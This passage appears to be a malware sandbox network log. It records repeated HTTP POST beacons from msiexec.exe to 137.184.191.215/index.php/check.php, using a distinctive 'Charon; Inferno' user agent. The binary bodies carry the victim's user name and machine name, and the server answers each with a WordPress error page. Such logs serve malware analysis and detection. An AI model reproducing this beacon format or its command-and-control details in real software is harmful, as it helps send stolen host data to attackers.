                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                        Oct 2, 2024 07:19:59.054970980 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                                        Oct 2, 2024 07:19:59.055191040 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                                        Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                                        Oct 2, 2024 07:19:59.056109905 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                                        Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        17192.168.2.459101137.184.191.215808076C:\Windows\SysWOW64\msiexec.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 2, 2024 07:19:59.209873915 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
                                        Oct 2, 2024 07:19:59.214833975 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                        Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
                                        Oct 2, 2024 07:20:01.879544020 CEST1236INHTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:19:59 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                        Oct 2, 2024 07:20:01.879966974 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                        Oct 2, 2024 07:20:01.879980087 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        18192.168.2.459102137.184.191.215808076C:\Windows\SysWOW64\msiexec.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 2, 2024 07:20:02.281871080 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
                                        Oct 2, 2024 07:20:02.286811113 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                        Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
                                        Oct 2, 2024 07:20:04.967272043 CEST1236INHTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:20:02 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                        Oct 2, 2024 07:20:04.967560053 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                                        Oct 2, 2024 07:20:04.967570066 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                                        Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                                        Oct 2, 2024 07:20:04.968673944 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                                        Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        19192.168.2.459103137.184.191.215808076C:\Windows\SysWOW64\msiexec.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 2, 2024 07:20:05.117207050 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
                                        Oct 2, 2024 07:20:05.122471094 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                        Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
                                        Oct 2, 2024 07:20:07.737092972 CEST1236INHTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:20:05 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                        Oct 2, 2024 07:20:07.737401009 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                        Oct 2, 2024 07:20:07.737412930 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        20192.168.2.459104137.184.191.215808076C:\Windows\SysWOW64\msiexec.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 2, 2024 07:20:07.880738020 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
                                        Oct 2, 2024 07:20:07.886271954 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                        Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
                                        Oct 2, 2024 07:20:10.514827013 CEST1236INHTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:20:08 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                        Oct 2, 2024 07:20:10.515367031 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                        Oct 2, 2024 07:20:10.515378952 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        21192.168.2.459105137.184.191.215808076C:\Windows\SysWOW64\msiexec.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 2, 2024 07:20:10.660384893 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
                                        Oct 2, 2024 07:20:10.665251017 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                        Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
                                        Oct 2, 2024 07:20:13.219569921 CEST1236INHTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:20:11 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
